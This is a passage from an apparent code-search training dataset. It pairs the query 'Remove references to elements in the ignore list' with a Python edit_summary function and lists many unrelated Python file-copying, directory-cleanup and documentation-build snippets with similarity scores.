\"ru.svg\", # Russia\n \"fr.svg\", # France\n \"pt.svg\", # Portugal\n \"dk.svg\", # Denmark\n \"nl.svg\", # Netherlands\n \"jp.svg\", # Japan\n \"cn.svg\", # China\n \"us.svg\", # USA\n \"th.svg\", # Thailand\n \"va.svg\", # Vatican\n \"it.svg\", # Italy\n \"kr.svg\", # South Korea\n \"pl.svg\", # Poland\n \"mm.svg\", # Myanamar (Burma)\n \"sa.svg\", # Saudi Arabia (best option for Arabic of those available)\n \"id.svg\", # Indonesia\n \"za.svg\", # South Africa (best option for Afrikaans)\n \"my.svg\", # Malaysia (for Malay)\n \"mg.svg\", # Madagascar (for Malagasy)\n \"ir.svg\", # Iran (for Persian)\n \"vn.svg\"} # Vietnam\n for filename in filelist:\n try:\n shutil.copy2(\"resources/flag-icon-css/flags/4x3/\" + filename, WEBOUT_PATH +\n \"images/flag-icon-css/flags/4x3/\")\n except FileNotFoundError:\n report_error(\"Missing file: images/flag-icon-css/flags/4x3/\" + TMP_PATH + filename)", "def pull(dirs = ['map','table', 'trigger', 'w3x2lni'], release='release/', development='development/'):\n\n if not os.path.exists(development):\n os.mkdir(development)\n\n if not os.path.exists(os.path.join(development, '.w3x')):\n shutil.copy(os.path.join(release, '.w3x'), os.path.join(development, '.w3x'))\n\n for directory in dirs:\n if os.path.exists(development+directory):\n shutil.rmtree(development+directory)\n shutil.copytree(release+directory,development+directory)", "def docs(session):\n session.install('-rrequirements-dev.txt')\n session.install('-e', '.')\n run_sphinx(session)", "def _clone_defaults(self, source, dest, context):\n\n for base, dirs, files in os.walk(source):\n relative = os.path.relpath(base, source)\n\n for d in dirs:\n os.makedirs(os.path.join(dest, relative, d))\n\n for filename in files:\n\n if not filename.endswith(self.valid_extensions):\n continue\n\n with open(os.path.join(base, filename), 'r') as f:\n data = f.read()\n\n with open(os.path.join(dest, relative, filename), 'w') as f:\n data = jinja2.Template(data).render(**context)\n f.write(data)", "def docsave(self):\n\n filename = filedialog.askdirectory(initialdir=self.root.cache_dir,\n title='Select Folder')\n self.save_entry_doc.clear()\n self.save_entry_doc.insert(tk.END, filename)\n self.root.cache_dir = filename", "def from_dir_changed(self):\n text = self.from_dir.toPlainText().strip()\n if os.path.exists(text):\n sqlite.w('update settings set source_path = (?) where id is 1', text)\n all_files = self.get_all_files_from_path(text, extension='PDF')\n self.pdf_files = self.make_all_files_dictionary(all_files)\n\n if not self.pdf_files:\n return\n\n self.reset_widgets(all=True)\n self.draw_pdf_files()", "def _docdir(request):\n\n # Trigger ONLY for the doctests.\n if isinstance(request.node, DoctestItem):\n\n # Get the fixture dynamically by its name.\n tmpdir = request.getfixturevalue('tmpdir')\n\n # Chdir only for the duration of the test.\n olddir = os.getcwd()\n tmpdir.chdir()\n yield\n os.chdir(olddir)\n\n else:\n # For normal tests, we have to yield, since this is a yield-fixture.\n yield", "def create_directory(resources_dir):\n for f in os.listdir(os.path.join(resources_dir, \"docs_for_ner\")):\n fpath = os.path.join(resources_dir, \"docs_for_ner\", f)\n if os.path.isfile(fpath):\n os.unlink(fpath)", "def temp_article_dir(temp_cwd: Path) -> Path:\n article_source_dir = Path(__file__).parent / \"data\" / \"article\"\n for source_path in article_source_dir.iterdir():\n relative_path = source_path.relative_to(article_source_dir)\n dest_path = Path.cwd().joinpath(relative_path)\n if source_path.is_dir():\n shutil.copytree(source_path, dest_path)\n else:\n shutil.copy(source_path, dest_path)\n\n return temp_cwd", "def main():\n # We know that qidoc build will set the correct cwd\n qibuild_dir = \"..\"\n qibuild_dir = os.path.abspath(qibuild_dir)\n this_file = __file__\n this_dir = os.path.dirname(this_file)\n cmake_api = os.path.join(this_dir, \"../source/advanced/cmake/api\")\n cmake_api = os.path.abspath(cmake_api)\n if not os.path.exists(cmake_api):\n os.makedirs(cmake_api)\n qibuild_cmake = os.path.join(qibuild_dir, \"cmake\", \"qibuild\")\n for filename in DOCUMENTED_FILES:\n cmake_file = os.path.join(qibuild_cmake, filename + \".cmake\")\n rst_file = os.path.join(cmake_api, filename + \".rst\")\n gen_cmake_doc(cmake_file, rst_file)", "def process(self, source, dest):\n\n if os.path.isfile(dest):\n print(\"File %s exists -> aborting\" % dest)\n exit(1)\n print(dest)\n \n fin = open(source)\n fout = open(dest, 'w')\n for l in fin.readlines():\n l = l.replace(\"AUTHOR\", self.author)\n l = l.replace(\"DESCRIPTION\", self.description)\n l = l.replace(\"NAMESPACE\", self.namespace)\n l = l.replace(\"MyComponent\", self.className)\n l = l.replace(\"INCDIR\", self.hDir)\n l = l.replace(\"CXXDIR\", self.cxxDir)\n l = l.replace(\"YEAR\", str(self.now.year))\n l = l.replace(\"DATE\", \"%d %s %d\" % (self.now.day, self.now.strftime(\"%b\"), self.now.year))\n fout.write(l)\n fout.close()\n fin.close()", "def copyDir(src, dst, includes, excludes = []):\n\tmultiFilesReplacements([], dst, src, includes, excludes)", "def basic_list_duo(source_dir):\n return source_file_contents(source_dir, \"basic_list_duo.md\")", "def finalize_options(self):\n self.build_dir = os.path.join(*DOC_BUILD_DIR.split(os.sep)[:-1])\n BuildDoc.finalize_options(self)", "def generate_docs(self) -> List[Path]:\n outputs = []\n for file in self.files:\n if (stem := file.stem) == \"__init__\":\n # We might have more than one __init__.py file depending on package structure and these files shouldn't\n # contain methods, so we don't want to convert them\n continue\n\n if not (doc := get_doc(file)):\n continue # No docstring returned, skip this file\n doc = doc[33:] # First 33 characters are not required for our docs\n\n # Write the output we've generated to a file\n (output := self.directory / f\"{stem}.md\").write_text(generate_header(stem) + doc)\n outputs.append(output)\n return outputs", "def copy(self, src, dest):\n\n src = os.path.join(os.path.dirname(__file__), \"collections\", \"kitchensink\", src)\n dest = os.path.join(self.checkout, dest)\n if os.path.isdir(src):\n shutil.copytree(src, dest)\n else:\n shutil.copy(src, dest)\n return dest", "def link_origin_doc(link_source, links, redistribution='none', zip_file=None):\n ldoc = link_doc(link_source, 'origin', links)\n ldoc['redistribution'] = redistribution\n if zip_file:\n ldoc['zip_file'] = zip_file\n return ldoc", "def archives_doc(ctx: click.Context, sources: Set[Path], state: State) -> None:\n modules = {\n file.parts[-1]: parse_module(str(file.absolute())).serialize()\n for file in sources\n }\n\n out(modules)\n ctx.exit(0)", "def _get_doc_files(self):\n return [(path.join(self.DocDirectory, 'conf.py'), 'Python')]", "def collect_source_hpp_files(self):\n for pattern in self.package_info.source_hpp_patterns:\n for filename in fnmatch.filter(self.source_hpp_files, pattern):\n self.package_info.source_hpp_files.append(os.path.basename(filename))\n self.source_dirs.add(os.path.abspath(os.path.dirname(filename)))\n\n for root, _, filenames in os.walk(self.source_root, followlinks=True):\n for pattern in self.package_info.source_hpp_patterns:\n for filename in fnmatch.filter(filenames, pattern):\n if \"pybindx\" not in filename:\n self.package_info.source_hpp_files.append(os.path.join(root, filename))\n self.package_info.source_hpp_files = [path for path in self.package_info.source_hpp_files\n if self.wrapper_root not in path]", "def createFakeSphinxProject(self):\n self.sourceDir.child(\"conf.py\").setContent(self.confContent.encode())\n self.sourceDir.child(\"index.rst\").setContent(self.indexContent.encode())", "def docs_build(directory, site_name, view=True, assume_yes=False):\n context = toolkit.load_data_context_with_error_handling(directory)\n build_docs(context, site_name=site_name, view=view, assume_yes=assume_yes)\n toolkit.send_usage_message(\n data_context=context, event=\"cli.docs.build\", success=True\n )", "def makedocs(projectfolder):\n featuremodel_path = path.join(projectfolder, \"productline\", \"model.xml\")\n configs_path = path.join(projectfolder, \"productline\", \"configs\")\n bddfeatures_path = path.join(projectfolder, \"bddfeatures\")\n testreports_path = path.join(projectfolder, \"testreports\")\n\n fmparser = parsers.FeatureModelParser()\n resultsparser = parsers.TestResultsParser()\n feature_tree_renderer = ftrenderer.FeatureTreeRenderer()\n\n docs_dir = path.join(projectfolder, \"docs/generated\")\n if path.exists(docs_dir):\n shutil.rmtree(docs_dir)\n makedirs(docs_dir)\n\n lektor_templates_path = \"doc_templates\"\n utilities.sed_inplace(\n path.join(lektor_templates_path, \"aplet.lektorproject\"),\n r'<<PROJECT>>',\n CONFIG[\"project_name\"])\n\n products = {}\n product_names = get_product_names_from_configs_path(configs_path)\n for product_name in product_names:\n productconfig_filepath = path.join(projectfolder, \"productline/configs\", product_name + \".config\")\n product_html_report_name = \"report{0}.html\".format(product_name)\n product_html_results_src = path.join(testreports_path, product_html_report_name)\n product_xml_report_name = \"report{0}.xml\".format(product_name)\n product_xml_results_src = path.join(testreports_path, product_xml_report_name)\n\n with open(productconfig_filepath, \"r\") as productconfig_file:\n products[product_name] = {}\n products[product_name]['features'] = [feature.strip() for feature in productconfig_file.readlines()]\n\n current_product_lektor_dir = path.join(lektor_templates_path, \"content/products\", product_name)\n if not path.exists(current_product_lektor_dir):\n makedirs(current_product_lektor_dir)\n\n product_filepath = path.join(current_product_lektor_dir,\"contents.lr\")\n shutil.copyfile(path.join(lektor_templates_path, \"helpers/product_contents.lr\"), product_filepath)\n\n feature_model = fmparser.parse_from_file(featuremodel_path)\n gherkin_pieces = ftrenderer.gherkin_pieces_grouped_by_featurename(bddfeatures_path)\n gherkin_piece_test_statuses = resultsparser.get_gherkin_piece_test_statuses_for_product_from_file(product_xml_results_src)\n configparser = parsers.ProductConfigParser(feature_model.root_feature.name)\n product_features = configparser.parse_config(productconfig_filepath)\n feature_model.trim_based_on_config(product_features)\n feature_model.add_gherkin_pieces(gherkin_pieces)\n feature_model.calculate_test_statuses(gherkin_piece_test_statuses)\n\n feature_tree_renderer.build_graphviz_graph(feature_model.root_feature)\n feature_tree_renderer.render_as_svg(current_product_lektor_dir, \"feature_model\")\n\n utilities.sed_inplace(product_filepath, r'<<PRODUCT>>', product_name)\n product_test_status = feature_model.root_feature.test_status\n utilities.sed_inplace(product_filepath, \"<<TEST_STATUS>>\", product_test_status.name)\n\n # Copy test run html report to generated docs\n if path.exists(product_html_results_src):\n shutil.copyfile(product_html_results_src, path.join(current_product_lektor_dir, product_html_report_name))\n\n click.echo(\"- Generating feature model SVG...\")\n click.echo(featuremodel_path)\n\n feature_model = fmparser.parse_from_file(featuremodel_path)\n gherkin_pieces = ftrenderer.gherkin_pieces_grouped_by_featurename(bddfeatures_path)\n gherkin_piece_test_statuses = resultsparser.get_gherkin_piece_test_statuses_for_dir(testreports_path)\n feature_model.add_gherkin_pieces(gherkin_pieces)\n feature_model.calculate_test_statuses(gherkin_piece_test_statuses)\n\n feature_tree_renderer.build_graphviz_graph(feature_model.root_feature)\n feature_tree_renderer.render_as_svg(path.join(lektor_templates_path, \"content/\"), \"feature_model\")\n\n click.echo(\"- Building site\")\n lektor_cmd = [\"lektor\", \"--project\", lektor_templates_path, \"build\", \"-O\", path.abspath(docs_dir)]\n click.echo(\"Running: \" + subprocess.list2cmdline(lektor_cmd))\n subprocess.call(lektor_cmd)\n\n product_map_renderer = mapbuilder.ProductMapRenderer()\n productline_generated_filepath = path.join(docs_dir, \"index.html\")\n html = product_map_renderer.get_productmap_html(feature_model, products)\n utilities.sed_inplace(productline_generated_filepath, r'<<PRODUCTMAP>>', html)", "def beehive_make_doc(self):\n run_data = {\n u'tags':[u'doc'],\n u'local_package_path':self.local_package_path\n } \n self.ansible_playbook(u'docs', run_data, \n playbook=self.beehive_doc_playbook)", "def set_save_directory(base, source):\r\n root = os.path.join(base, source)\r\n if not os.path.isdir(root):\r\n os.makedirs(root)\r\n\r\n world.screenshot_root = root", "def opendocs():\n _open_file('_build/index.html')", "def clean(self):\n if os.path.exists(self.paths['build_dir']):\n shutil.rmtree(self.paths['build_dir'])\n if os.path.exists(os.path.join(self.base_dir, 'docs')):\n shutil.rmtree(os.path.join(self.base_dir, 'docs'))", "def bib_minimal(tmpdir) -> str:\n src = resource_filename(\"tests\", \"libs/minimal.bib\")\n dst = str(tmpdir.join(\"tmp.bib\"))\n\n # Copy the file to the temporary directory and return the path\n copyfile(src, dst)\n return dst", "def main(input):\n path = os.path.abspath(input)\n name = os.path.splitext(os.path.basename(path))[0]\n p = os.path.join(os.getcwd(),name)\n i = 1\n p1 = p\n while os.path.exists(p1):\n p1 = \"{p}-{i}\".format(p=p,i=i)\n i += 1\n p = p1\n os.mkdir(p1)\n os.mkdir(os.path.join(p1,\"media\"))\n with zipfile.ZipFile(path) as zf:\n for file in zf.namelist():\n # Path traversal defense copied from\n # http://hg.python.org/cpython/file/tip/Lib/http/server.py#l789\n words = file.split('/')\n dest = os.path.join(p1, \"media\")\n if words[0] == \"word\" and words[1] == \"media\":\n for word in words[2:]:\n while True:\n drive, word = os.path.splitdrive(word)\n head, word = os.path.split(word)\n if not drive:\n break\n if word in (os.curdir, os.pardir, ''):\n continue\n dest = os.path.join(dest, word)\n click.echo(\"{} -> {}\".format(file, dest))\n of = open(dest, 'wb')\n of.write(zf.read(file))\n of.close()\n\n newdoc = os.path.join(p1, os.path.basename(path))\n lyxfile = os.path.join(p1, name + \".lyx\")\n texfile = os.path.join(p1, name + \".tex\")\n shutil.copyfile(path, newdoc)\n os.system(\"pandoc -s -f docx -t latex -o '{of}' '{i}'\".format(of=texfile, i=newdoc))\n os.system(\"tex2lyx '{i}' '{o}'\".format(i=texfile, o=lyxfile))\n os.remove(texfile)\n os.system(\"convertwmf {dir}\".format(dir=os.path.join(p1, \"media\")))\n click.echo(lyxfile)", "def copy_source_files(self):\n\n LOGGER.info(f'start copying source files')\n count = 0\n for sfp in tqdm(sorted(self.source_fps), disable=self.disable_tqdm):\n try:\n meta = extract_law_meta(sfp)\n nodes = parse_xml_fp(sfp)\n tfp = self.stot(sfp)\n tfp.parent.mkdir(parents=True, exist_ok=True)\n save_law_tree(meta['LawTitle'], nodes, tfp)\n except Exception as e:\n LOGGER.error(f'failed to copy {sfp}: {e}')\n continue\n self.target_fps.add(tfp)\n LOGGER.debug(f'copied {sfp} to {tfp}')\n count += 1\n LOGGER.info(f'copied total {count} source files, now total {len(self.target_fps)} target files exist')", "def install(self):\n if self.__checkDestination():\n if self.__ui:\n self.__ui.progressText.append('Destination found, removing it...')\n self.__removeFiles(self.__targetPath, verbose=True)\n if self.__ui:\n self.__ui.progressText.append('Copying files...')\n self.__copyFiles()\n if self.__ui:\n self.__ui.progressText.append('Runnign checks...')\n if not self.__runChecks():\n raise InstallationError(\"The installation has fail, it did not pass one of the checks\")\n\n # Clean the tmp folder by removing the source\n self.__removeFiles(self.__sourcePath)", "def copy_dir(source, dest, vars, verbosity=1, simulate=False, indent=0,\n sub_vars=True, interactive=False, overwrite=True,\n template_renderer=None, out_=sys.stdout):\n def out(msg):\n out_.write(msg)\n out_.write('\\n')\n out_.flush()\n # This allows you to use a leading +dot+ in filenames which would\n # otherwise be skipped because leading dots make the file hidden:\n vars.setdefault('dot', '.')\n vars.setdefault('plus', '+')\n use_pkg_resources = isinstance(source, tuple)\n if use_pkg_resources:\n names = sorted(pkg_resources.resource_listdir(source[0], source[1]))\n else:\n names = sorted(os.listdir(source))\n pad = ' '*(indent*2)\n if not os.path.exists(dest):\n if verbosity >= 1:\n out('%sCreating %s/' % (pad, dest))\n if not simulate:\n makedirs(dest, verbosity=verbosity, pad=pad)\n elif verbosity >= 2:\n out('%sDirectory %s exists' % (pad, dest))\n for name in names:\n if use_pkg_resources:\n full = '/'.join([source[1], name])\n else:\n full = os.path.join(source, name)\n reason = should_skip_file(name)\n if reason:\n if verbosity >= 2:\n reason = pad + reason % {'filename': full}\n out(reason)\n continue # pragma: no cover\n if sub_vars:\n dest_full = os.path.join(dest, substitute_filename(name, vars))\n sub_file = False\n if dest_full.endswith('_tmpl'):\n dest_full = dest_full[:-5]\n sub_file = sub_vars\n if use_pkg_resources and pkg_resources.resource_isdir(source[0], full):\n if verbosity:\n out('%sRecursing into %s' % (pad, os.path.basename(full)))\n copy_dir((source[0], full), dest_full, vars, verbosity, simulate,\n indent=indent+1,\n sub_vars=sub_vars, interactive=interactive,\n template_renderer=template_renderer, out_=out_)\n continue\n elif not use_pkg_resources and os.path.isdir(full):\n if verbosity:\n out('%sRecursing into %s' % (pad, os.path.basename(full)))\n copy_dir(full, dest_full, vars, verbosity, simulate,\n indent=indent+1,\n sub_vars=sub_vars, interactive=interactive,\n template_renderer=template_renderer, out_=out_)\n continue\n elif use_pkg_resources:\n content = pkg_resources.resource_string(source[0], full)\n else:\n f = open(full, 'rb')\n content = f.read()\n f.close()\n if sub_file:\n try:\n content = substitute_content(\n content, vars, filename=full,\n template_renderer=template_renderer\n )\n except SkipTemplate:\n continue # pragma: no cover\n if content is None:\n continue # pragma: no cover\n already_exists = os.path.exists(dest_full)\n if already_exists:\n f = open(dest_full, 'rb')\n old_content = f.read()\n f.close()\n if old_content == content:\n if verbosity:\n out('%s%s already exists (same content)' %\n (pad, dest_full))\n continue # pragma: no cover\n if interactive:\n if not query_interactive(\n native_(full, fsenc), native_(dest_full, fsenc),\n native_(content, fsenc), native_(old_content, fsenc),\n simulate=simulate, out_=out_):\n continue\n elif not overwrite:\n continue # pragma: no cover\n if verbosity and use_pkg_resources:\n out('%sCopying %s to %s' % (pad, full, dest_full))\n elif verbosity:\n out(\n '%sCopying %s to %s' % (pad, os.path.basename(full),\n dest_full))\n if not simulate:\n f = open(dest_full, 'wb')\n f.write(content)\n f.close()", "def fetch_sample_templates():\n source_folder = Path(root, 'templates', 'sample_setup_files')\n Path('sample_templates').mkdir(parents=True, exist_ok=True)\n target_folder = Path().resolve()\n target_folder = Path(target_folder, 'sample_templates')\n\n copytree(source_folder, target_folder, dirs_exist_ok=True)\n logger.info(f'Sample templates can be found in directory {target_folder}')" ]
[ "0.71197486", "0.64806306", "0.61687136", "0.6106528", "0.6040729", "0.599639", "0.59881204", "0.59192413", "0.5918901", "0.5830127", "0.5795234", "0.57863706", "0.5776979", "0.57418394", "0.57132345", "0.5694525", "0.5685527", "0.5615512", "0.5591277", "0.5551153", "0.55445683", "0.5515156", "0.5491799", "0.5465701", "0.5438618", "0.5434961", "0.5416356", "0.5407375", "0.5406556", "0.53710455", "0.5356547", "0.53496766", "0.5346021", "0.53440166", "0.5296017", "0.5277491", "0.526867", "0.5242279", "0.5240818", "0.52367914", "0.52213675", "0.5215917", "0.5212194", "0.52109337", "0.5190141", "0.5126023", "0.5125817", "0.5098223", "0.5080392", "0.5072271", "0.5070331", "0.5054807", "0.50507647", "0.5048944", "0.5043583", "0.50409925", "0.50222486", "0.5019646", "0.50177246", "0.5017504", "0.5016311", "0.50163", "0.5010621", "0.5007585", "0.5001586", "0.4983763", "0.49799916", "0.49705622", "0.4969964", "0.49668264", "0.49629387", "0.4955821", "0.49553302", "0.49514562", "0.49504548", "0.49420136", "0.49382907", "0.49351594", "0.4929646", "0.4926684", "0.49248776", "0.49238023", "0.4922754", "0.4914157", "0.4906165", "0.4903975", "0.49022302", "0.48997435", "0.48839262", "0.48795855", "0.48659164", "0.48599696", "0.48534092", "0.48510876", "0.4844818", "0.48371145", "0.48338884", "0.48305914", "0.48298594", "0.48295492", "0.4817259" ]
0.0
-1
Remove references to elements in the ignore list.
def edit_summary(): with open("docs/SUMMARY.md", "r") as opened_file: summary = opened_file.readlines() with open("docs/SUMMARY.md", "w") as opened_file: for line in summary: if not any(ext in line for ext in ignore_list): opened_file.write(line)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def remove_ignore_list(book_list):\n my_ignore_list = ['a','able','about','across','after','all','almost','also',\n 'am','an','and','any','are','as','at','be','because',\n 'been','but','by','can','cannot','could','did','do','does',\n 'for','from','get','got','had','has','have','he','her','hers',\n 'him','his','how','however','i','if','in','into','is']\n\n book_list = filter(lambda book_list: book_list not in my_ignore_list, book_list)\n\n return book_list", "def _remove_all_matches(values, needle):\n values[:] = (i for i in values if i != needle)", "def _clean_ignored(self, tokens):\n return list(filter(lambda t : t.token_value not in self._ignored, tokens))", "def remove(self, items, relative=True):\n if relative: items = self.items[items]\n self.items = np.setdiff1d(self.items, items)", "def rm(x, l):\n return [y for y in l if x != y]", "def remove_all(self, item):\n # type: (Any) -> None\n item = self.ref(item)\n while list.__contains__(self, item):\n list.remove(self, item)", "def remove_elements(l, e):\n return [x for x in l if x != e]", "def removeAll(self, *args):\n pass", "def exclude_list(self):\n pass", "def clean_up_dict(clean_dict, ignore_list):\n for i in ignore_list:\n clean_dict.pop(i, None)\n return clean_dict", "def prune_unlinked(self):\n linked_ids = set()\n for (link_from, link_to, link_style, link_tail) in self.links:\n linked_ids.add(link_from)\n linked_ids.add(link_to)\n nodes_to_delete = []\n for name, node in self.nodes.items():\n if node.node_id not in linked_ids:\n nodes_to_delete.append(name)\n for name in nodes_to_delete:\n del self.nodes[name]", "def test_prune_ignore_list(self, ignore_list, expected_ignored_dirs,\n expected_ignored_files):\n all_dirs = []\n all_files = []\n\n for path in self.paths:\n rel_dir_root = path[\"root\"]\n dirs = path[\"dirs\"]\n files = path[\"files\"]\n self.file_scanner._prune(\n rel_dir_root, dirs, files, ignore_list=ignore_list)\n all_dirs.extend(dirs)\n all_files.extend(files)\n\n [self.assertNotIn(d, all_dirs) for d in expected_ignored_dirs]\n [self.assertNotIn(f, all_files) for f in expected_ignored_files]", "def ignore(self, receptors_to_ignore: list[str] | list[None]) -> None:\n self._assert_receptor_input_is_valid(receptors_to_ignore)\n self._ignore = [\n r for r in self.observer.photoreceptors if r in receptors_to_ignore\n ]", "def _remove_redundant_signals(self, signals: List[Signal]):\n open_positions = self._broker.get_positions()\n tickers_with_open_positions = set(\n self._contract_to_ticker(position.contract()) for position in open_positions\n )\n\n signals_with_suggested_exposure_out = [signal for signal in signals if\n signal.suggested_exposure == Exposure.OUT]\n redundant_signals = [signal for signal in signals_with_suggested_exposure_out\n if signal.ticker not in tickers_with_open_positions]\n\n for signal in redundant_signals:\n signals.remove(signal)", "def remove_pathways(self, pathways: list):\n # only filter the gene_set object\n for pathway_id in pathways:\n self.gene_sets.pop(pathway_id, None)\n self.gene_set_names.pop(pathway_id, None)\n self.gene_set_size.pop(pathway_id, None)\n self.n_curated.pop(pathway_id, None)\n self.n_interactors.pop(pathway_id, None)\n if len(self.interactors) > 0:\n self.interactors.pop(pathway_id, None)", "def ignores(self):\n pass # make ignore_tags unaccessible", "def ignored_lists(self) -> List[str]:\n return self.__lists_to_ignore", "def drop_mark(self, mark):\n if type(mark) is list:\n for m in mark:\n self.drop_mark(m)\n return\n to_prune = []\n for sample, _mark in self['marks'].items():\n if mark==_mark:\n to_prune.append(sample)\n\n self.drop_library(to_prune)", "def clear_includepatterns(self):\n self._excludepatterns = []", "def clear_excludepatterns(self):\n self._excludepatterns = []", "def eraseAll(self): # remove all robots\n\t\tself.__robotList = []", "def dedupe(self):\n elems = []\n for x in self.elems:\n if x not in elems:\n elems.append(x)\n return _coconut_tail_call(self.__class__, *elems)", "def remove_all(self, *items):\n for item in items:\n self.remove(item)", "def remove_all(el, lst):\n for _ in lst:\n lst.remove(el)", "def remove_false_positives(headlines,exclusions):\r\n for headline in headlines:\r\n for word in exclusions:\r\n if headline.lower().find(word) != -1: #If headline contains exclusionary word.\r\n headlines.remove(headline)\r\n break\r\n return headlines", "def remove_refs(self):\n\n self.reference = None\n self.url = None", "def _removeUnusedElements(self, element):\n self.log(\"element:%r\" % element)\n for pad in element.src_pads():\n if pad.is_linked():\n peer = pad.get_peer().get_parent()\n self._removeUnusedElements(peer)\n if not peer in self._validelements:\n self.log(\"removing %s\" % peer.get_name())\n pad.unlink(pad.get_peer())\n peer.set_state(gst.STATE_NULL)\n self.remove(peer)", "def exclude(self, *args, **kwargs):", "def _remove_gitignore_files(self, log_prompt: str) -> None:\n try:\n repo = git.Repo(self._content_repo)\n files_to_ignore = repo.ignored(self._facts[\"lint_files\"])\n for file in files_to_ignore:\n logger.info(f\"{log_prompt} - Skipping gitignore file {file}\")\n self._facts[\"lint_files\"] = [\n path\n for path in self._facts[\"lint_files\"]\n if path not in files_to_ignore\n ]\n\n except (git.InvalidGitRepositoryError, git.NoSuchPathError):\n logger.debug(\"No gitignore files is available\")", "def removeModulesNotOnAPathExcluding( process, keepList=() ):\n allMods=set((x for x in process.producers_().iterkeys()))\n allMods.update((x for x in process.filters_().iterkeys()))\n allMods.update((x for x in process.analyzers_().iterkeys()))\n allMods.update((x for x in process.outputModules_().iterkeys()))\n \n modulesOnPaths = set()\n for p in process.paths_():\n modulesOnPaths.update( (x for x in getattr(process,p).moduleNames())) \n for p in process.endpaths_():\n modulesOnPaths.update( (x for x in getattr(process,p).moduleNames()))\n\n notOnPaths = allMods.difference(modulesOnPaths)\n \n keepModuleNames = set( (x.label_() for x in keepList) )\n \n getRidOf = notOnPaths.difference(keepModuleNames)\n \n for n in getRidOf:\n delattr(process,n)", "def clean(self):\n return _coconut_tail_call((self.__class__), *filter(_coconut.functools.partial(_coconut.operator.ne, self.identity), self.elems))", "def remove_features(sets_x, unused_features):\n\n # initiate empty list for return variable\n significant_x = [] \n\n # iterate through subsets and their corresponding insignificant features\n for x, features in zip(sets_x, unused_features):\n # remove features from subset and store the result into list\n significant_x.append(np.delete(x,features,1))\n \n return significant_x", "def Ignore(self, relative_file):\n return Whitelisted(relative_file)", "def reset(self):\n super().reset()\n self._includes = set(self.class_helper._includes)", "def remove_definitions_from(self, definitions):\n if isinstance(definitions, set):\n excluded_definitions = definitions\n else:\n excluded_definitions = set(definitions)\n assert all(x.library == self for x in excluded_definitions), \"Some definitions to remove are not included in \" \\\n \"the library \"\n included_definitions = list()\n for definition in self._definitions:\n if definition not in excluded_definitions:\n included_definitions.append(definition)\n else:\n self._remove_definition(definition)\n self._definitions = included_definitions", "def clean_duplicate(self):\r\n self.elements = list(set(self.elements))\r\n self.elements = [e for e in self.elements if e != '']", "def ignore_from_package(self, project, package, arch, ignore):\n for binary in binary_list(self.apiurl, project, 'standard', arch, package):\n ignore.add(binary.name)\n\n return ignore", "def ignores(self):\n return self._ignores", "def reset(self):\n super().reset()\n whitelist = []\n for parent in self.cls.mro():\n whitelist.extend(getattr(parent, 'tab_whitelist', []))\n\n if getattr(parent, \"tab_component_names\", False):\n for cpt_name in parent.component_names:\n if getattr(parent, cpt_name).kind != Kind.omitted:\n whitelist.append(cpt_name)\n\n self._includes = set(whitelist)", "def hole_cleanup(atom_list): \n joey = atom_list.copy()\n while (len(joey) != 0):\n for atom in joey:\n takein = [atom]\n source_update = takein.copy()\n check = 1\n while (check == 1):\n source = source_update.copy()\n source_update = []\n c = len(takein)\n for element in source:\n bonds = [bond[0] for bond in identify_bonds(element, joey) if bond[0] not in takein]\n for h in bonds:\n takein.append(h)\n source_update.append(h)\n if ((len(takein) == c) and (len(takein) < 6)):\n check = 0\n for element in takein:\n atom_list.remove(element)\n elif (len(takein) == c):\n check = 0\n for element in takein:\n joey.remove(element)\n return atom_list", "def _visit_ignore(self, elem):\n pass", "def _visit_ignore(self, elem):\n pass", "def removeDoublon(liste):\n tmp=[]\n for i,elt in enumerate(liste):\n if elt not in tmp:\n tmp.append(elt)\n return tmp", "def remove(self, *args):\n return _libsbml.ListOfReplacedElements_remove(self, *args)", "def ignores(self, value):\n value += self.__default_ignores\n tags, attributes = self._process_ignores(value)\n self.__ignores = list([tags, attributes])", "def remove():", "def remove(self, x):\n self._seen.remove(x)\n self._list.remove(x)", "def removeAll(self, c):\n for x in c:\n if x in self.knownStrings:\n self.knownStrings.remove(x)", "def ignore(self, regex: str) -> None:\n self._processed |= set(self.find(regex))", "def remove_paths(self, test):\n ii = 0\n while ii < len(self.paths):\n if test(self.paths[ii]):\n self.paths.pop(ii)\n else:\n ii += 1\n return self", "def ignore(self) -> list[str] | list[None]:\n if self._ignore is None:\n print(self.__class__.ignore.__doc__)\n raise SilSubProblemError(\n \"The *ignore* property has not been set (see above).\"\n )\n return self._ignore", "def FilterOutUnusedExpectations(self) -> Dict[str, List[BaseExpectation]]:\n logging.info('Filtering out unused expectations')\n unused = collections.defaultdict(list)\n unused_count = 0\n for (expectation_file, expectation,\n builder_map) in self.IterBuilderStepMaps():\n if not builder_map:\n unused[expectation_file].append(expectation)\n unused_count += 1\n for expectation_file, expectations in unused.items():\n for e in expectations:\n del self[expectation_file][e]\n logging.debug('Found %d unused expectations', unused_count)\n\n empty_files = []\n for expectation_file, expectation_map in self.items():\n if not expectation_map:\n empty_files.append(expectation_file)\n for empty in empty_files:\n del self[empty]\n logging.debug('Found %d empty files: %s', len(empty_files), empty_files)\n\n return unused", "def remove_values_from_list(self,list_,*values):\r\n for value in values:\r\n while value in list_:\r\n list_.remove(value)", "def delete_loops(self, in_path):\n res_path = list(in_path)\n for element in res_path:\n coincidences = self.get_coincidence_indices(res_path, element)\n #Reversa la lista para eliminar elementos de atras hacia adelante de la lista\n coincidences.reverse()\n for i, coincidence in enumerate(coincidences):\n if not i == len(coincidences)-1:\n res_path[coincidences[i+1]:coincidence] = []\n\n return res_path", "def retainAll(self, *args):\n pass", "def ancestor_remove_tags(self, tags):\n\n for ancestor in self.lineage():\n ancestor.remove_tags(tags)", "def stopword_removal(words):\n stops = set(stopwords.words('english'))\n words = [w for w in words if w not in stops]\n return words", "def without_duplicates(words):\n\n # the long way: add each item to a set through iteration\n #\n # duplicate_remover = set([])\n # for word in words:\n # duplicate_remover.add(word)\n # words = list(duplicate_remover)\n # return words\n\n # the quick version: convert to set removes duplicates, convert back\n words = set(words)\n return list(words)", "def remove(self, *args):\n return _libsbml.ListOf_remove(self, *args)", "def trim_adjacency_list(adj):\n old_list = adj.copy()\n for key in adj.keys():\n if links_to(old_list, key) == []:\n del(adj[key])\n return adj", "def prune(self, exclude: set[Path]) -> None:\n assert all(self.basedir in p.parents for p in exclude) # nosec\n\n after_relpaths = {p.relative_to(self.basedir) for p in exclude}\n to_delete = self.before_relpaths.difference(after_relpaths)\n\n for p in to_delete:\n path = self.basedir / p\n assert path.exists() # nosec\n\n if 